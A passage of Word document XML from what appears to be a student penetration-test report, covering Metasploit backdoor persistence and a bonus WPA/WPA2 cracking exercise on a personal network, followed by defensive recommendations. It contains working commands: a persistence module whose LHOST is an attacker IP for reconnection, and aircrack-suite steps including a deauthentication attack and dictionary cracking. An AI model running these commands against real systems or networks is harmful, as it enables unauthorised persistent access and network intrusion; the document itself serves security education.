    <w:p w14:paraId="72C0C8C9" w14:textId="1339909B" w:rsidR="00FD3E2A" w:rsidRDefault="001E672B" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001E672B">
        <w:t xml:space="preserve">To ensure continued access, we installed a persistent </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E672B">
        <w:t>backdoor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E672B">
        <w:t xml:space="preserve"> using the Metasploit persistence module:</w:t>
      </w:r>
      <w:r w:rsidR="00FD3E2A" w:rsidRPr="00FD3E2A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C88B59E" w14:textId="7D721DD7" w:rsidR="001E672B" w:rsidRDefault="00FD3E2A" w:rsidP="007D2747">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F4D25D" wp14:editId="325D034D">
            <wp:extent cx="6400800" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1214338180" name="Picture 1" descr="backdoor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38180" name="Picture 1" descr="backdoor install"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="2838450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E08335" w14:textId="71BC1173" w:rsidR="00346024" w:rsidRPr="00920B1C" w:rsidRDefault="00365457" w:rsidP="007D2747">
      <w:r w:rsidRPr="00365457">
        <w:t>After installation, this backdoor allows automatic reconnection upon system reboot, ensuring continued access for the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE4D7E" w14:textId="1C821EB3" w:rsidR="001E672B" w:rsidRPr="001E672B" w:rsidRDefault="001E672B" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E672B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE63AB7" w14:textId="04CC63B8" w:rsidR="001E672B" w:rsidRPr="001E672B" w:rsidRDefault="001E672B" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E672B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>use windows/local/persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A25A8D9" w14:textId="77777777" w:rsidR="001E672B" w:rsidRPr="001E672B" w:rsidRDefault="001E672B" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E672B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBCCB08" w14:textId="77777777" w:rsidR="001E672B" w:rsidRPr="001E672B" w:rsidRDefault="001E672B" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E672B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>set LHOST 100.123.236.70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD44BC2" w14:textId="40971E54" w:rsidR="001E672B" w:rsidRDefault="001E672B" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E672B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>set LPORT 900</w:t>
      </w:r>
      <w:r w:rsidR="00920B1C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001E672B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD65027" w14:textId="07C3B515" w:rsidR="00054F23" w:rsidRPr="00FD4806" w:rsidRDefault="00054F23" w:rsidP="007661C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD4806">
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDB21F" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enhance email filtering, implement anti-phishing training, and restrict execution of unverified attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3733D1" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Regularly update and patch systems to close vulnerabilities that can be exploited through social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CBA9A0" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Harden endpoint security to detect and block suspicious payload execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55372AA7" w14:textId="77777777" w:rsidR="00054F23" w:rsidRPr="00FD4806" w:rsidRDefault="00054F23" w:rsidP="007661C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD4806">
        <w:t>Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F0BEC" w14:textId="401A9375" w:rsidR="003B094A" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>For further reading on phishing and related attacks, please refer to OWASP Phishing Prevention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63472CBE" w14:textId="77777777" w:rsidR="0033546C" w:rsidRDefault="0033546C" w:rsidP="0033546C"/>
    <w:p w14:paraId="6EEAF83F" w14:textId="2AB53D06" w:rsidR="0033546C" w:rsidRDefault="00221F08" w:rsidP="00221F08">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bonus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E5105" w14:textId="5972E3A9" w:rsidR="00954121" w:rsidRDefault="001A4CBA" w:rsidP="00954121">
      <w:r w:rsidRPr="001A4CBA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A4CBA">
        <w:t xml:space="preserve"> Crack any Wi-Fi Access Point Encryption (WPA/WPA2) [5%]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04556B95" w14:textId="2F55C0F8" w:rsidR="001A4CBA" w:rsidRPr="00954121" w:rsidRDefault="001A4CBA" w:rsidP="001A4CBA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001A4CBA">
        <w:t>The aim of this task was to identify and exploit weaknesses in Wi-Fi encryption by capturing the WPA/WPA2 handshake and subsequently cracking the password. This demonstration highlights potential vulnerabilities in networks that use weak or easily guessable passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215D2356" w14:textId="77777777" w:rsidR="00F26C55" w:rsidRPr="00F26C55" w:rsidRDefault="00F26C55" w:rsidP="00F26C55">
      <w:r w:rsidRPr="00F26C55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D215CEF" w14:textId="77777777" w:rsidR="00F26C55" w:rsidRPr="00F26C55" w:rsidRDefault="00F26C55" w:rsidP="00F26C55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26C55">
        <w:t>Personal Wi-Fi network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F6E343" w14:textId="77777777" w:rsidR="00F26C55" w:rsidRPr="00F26C55" w:rsidRDefault="00F26C55" w:rsidP="00F26C55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26C55">
        <w:t>Personal machine running Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41796226" w14:textId="77777777" w:rsidR="00F26C55" w:rsidRPr="00F26C55" w:rsidRDefault="00F26C55" w:rsidP="00F26C55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26C55">
        <w:t>Wi-Fi adapter with monitor mode capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9FCDBA" w14:textId="77777777" w:rsidR="00F26C55" w:rsidRPr="00F26C55" w:rsidRDefault="00F26C55" w:rsidP="00F26C55">
      <w:r w:rsidRPr="00F26C55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detailed Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A4242D" w14:textId="77777777" w:rsidR="00F26C55" w:rsidRPr="00F26C55" w:rsidRDefault="00F26C55" w:rsidP="001539B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F26C55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enabling Monitor Mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F26C55">
        <w:br/>
        <w:t>To begin, we switched our Wi-Fi adapter to monitor mode to capture all wireless traffic. This was achieved using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0D0F9" w14:textId="6A7BA4FC" w:rsidR="00221F08" w:rsidRDefault="007140EF" w:rsidP="001539B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007140EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007140EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D862ED" w14:textId="06448BBE" w:rsidR="007140EF" w:rsidRDefault="001539B8" w:rsidP="001539B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001539B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Capturing Traffic:</w:t>
      </w:r>
      <w:r w:rsidRPr="001539B8">
        <w:br/>
        <w:t xml:space="preserve">Next, we used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001539B8">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001539B8">
        <w:t>-ng to focus on the target Wi-Fi network and capture the necessary EAPOL packets—the four-way handshake used in WPA/WPA2 authentication. The command used was:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16250542" w14:textId="3DCA2069" w:rsidR="00592A69" w:rsidRDefault="00592A69" w:rsidP="007A6B22">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">-ng -c </w:t>
      </w:r>
      <w:r w:rsidR="00283874" w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00283874" w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>6E:D5:D</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00283874" w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2:02:BE:51</w:t>
      </w:r>
      <w:r w:rsidR="00C858C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-w capture wlan0mon</w:t>
      </w:r>
      <w:r w:rsidR="00D8424B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39F00B43" wp14:editId="4C631B0F">
            <wp:extent cx="4184073" cy="3457385"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="1575821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21484" name="Picture 1"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7" t="-10" r="54173" b="29523"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4190225" cy="3462469"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CB5DDB" w14:textId="493A2090" w:rsidR="0033412E" w:rsidRPr="0033412E" w:rsidRDefault="0033412E" w:rsidP="003F66C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F66C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Obtaining a Fresh Handshake:</w:t>
      </w:r>
      <w:r w:rsidRPr="0033412E">
        <w:br/>
        <w:t xml:space="preserve">We ensured a fresh handshake was captured by monitoring devices connecting to the network. When no handshake was immediately observed, we employed a DE authentication attack using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0033412E">
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0033412E">
        <w:t>-ng to force a connected device to disconnect and reconnect, triggering the handshake process. The command used was:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC639D" w14:textId="5DF2147C" w:rsidR="0033412E" w:rsidRPr="0033412E" w:rsidRDefault="007747D8" w:rsidP="0033412E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007747D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0033412E" w:rsidRPr="0033412E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0033412E" w:rsidRPr="0033412E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">-ng -0 5 -a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C858C4" w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>6E:D5:D</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C858C4" w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2:02:BE:51</w:t>
      </w:r>
      <w:r w:rsidR="00C858C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0033412E" w:rsidRPr="0033412E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-c client MAC wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426893D0" w14:textId="6B7CE44F" w:rsidR="003F66C0" w:rsidRPr="003F66C0" w:rsidRDefault="003F66C0" w:rsidP="003F66C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F66C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cracking the Wi-Fi Password:</w:t>
      </w:r>
      <w:r w:rsidRPr="003F66C0">
        <w:br/>
        <w:t xml:space="preserve">Once the handshake was successfully captured, we used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F66C0">
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F66C0">
        <w:t>-ng to perform a dictionary attack on the handshake file. The command executed was:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057DC634" w14:textId="0EA10E6B" w:rsidR="003F66C0" w:rsidRPr="003F66C0" w:rsidRDefault="003F66C0" w:rsidP="00DA577F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F66C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F66C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">-ng -a2 -b </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DA577F" w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>6E:D5:D</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DA577F" w:rsidRPr="00283874">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2:02:BE:51</w:t>
      </w:r>
      <w:r w:rsidR="00DA577F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F66C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-w rockyou.txt capture-0</w:t>
      </w:r>
      <w:r w:rsidR="00973BAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="003F66C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6322352C" w14:textId="77777777" w:rsidR="00B14047" w:rsidRDefault="003F66C0" w:rsidP="003F66C0">
      <w:r w:rsidRPr="003F66C0">
        <w:t>Here, the tool tested multiple password guesses from the rockyou.txt wordlist until the correct password was discovered.</w:t>
      </w:r>
      <w:r w:rsidR="00B14047">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED9A52" w14:textId="0DED28CB" w:rsidR="00B14047" w:rsidRPr="00B14047" w:rsidRDefault="00B14047" w:rsidP="003F66C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14047">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password: 1223334444</w:t>
      </w:r>
      <w:r w:rsidR="00DA577F" w:rsidRPr="00B14047">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B958814" w14:textId="54ADC1B8" w:rsidR="007A6B22" w:rsidRPr="00283874" w:rsidRDefault="00B14047" w:rsidP="003F66C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C67BBB1" wp14:editId="7A45B78C">
            <wp:extent cx="3276600" cy="3493967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30155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59623" b="23457"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3282282" cy="3500026"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007A6B22" w:rsidRPr="00283874">
      <w:headerReference w:type="default" r:id="rId19"/>
      <w:footerReference w:type="default" r:id="rId20"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="540" w:right="990" w:bottom="810" w:left="1170" w:header="180" w:footer="1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5D200" w14:textId="77777777" w:rsidR="009C6FAB" w:rsidRDefault="009C6FAB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="702629C1" w14:textId="77777777" w:rsidR="009C6FAB" w:rsidRDefault="009C6FAB"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04601920" w14:textId="77777777" w:rsidR="009C6FAB" w:rsidRDefault="009C6FAB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
